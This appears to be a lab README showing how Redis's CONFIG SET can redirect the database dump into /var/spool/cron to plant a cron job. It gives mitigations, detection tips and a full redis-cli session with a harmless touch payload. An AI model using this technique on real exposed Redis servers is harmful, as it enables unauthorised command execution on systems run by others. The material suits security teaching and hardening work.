redis-exploitation
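CONFIG SET (For educational purposes only)
Lab demo of why an exposed CONFIG command is dangerous: a client that can issue CONFIG SET can redirect the dump directory and file name, so SAVE writes the RDB file, including client-supplied key values, to a path of the client's choosing (here a crontab). It only succeeds when the redis-server process has write access to that path; in this container it appears to run as root.
Mitigations: require authentication (requirepass, or ACLs on Redis 6+), keep protected-mode on and bind only to trusted interfaces, run redis-server as an unprivileged user, and disable or rename CONFIG with rename-command. For detection, watch for CONFIG SET dir / dbfilename calls and for unexpected files that start with the REDIS magic header in cron directories.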
Build
$ docker build -t victim .
Run
$ docker run -d --name victim victim
Attack (commands run from a shell inside the victim container; the cron directory is empty beforehand)
$ docker exec -it victim bash
[root@34ea33cb2eb2 /]# ls /var/spool/cron/
[root@34ea33cb2eb2 /]# redis-cli
127.0.0.1:6379> config set dir /var/spool/cron/
OK
127.0.0.1:6379> config set dbfilename root
OK
127.0.0.1:6379> set payload "\n*/1 * * * * /bin/touch /tmp/foo\n"
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379>
[root@34ea33cb2eb2 /]# cat /var/spool/cron/root
REDIS0007 redis-ver3.2.12
redis-bits@ctime]&used-meme
payload!
*/1 * * * * /bin/touch /tmp/foo
5[root@34ea33cb2eb2 /]#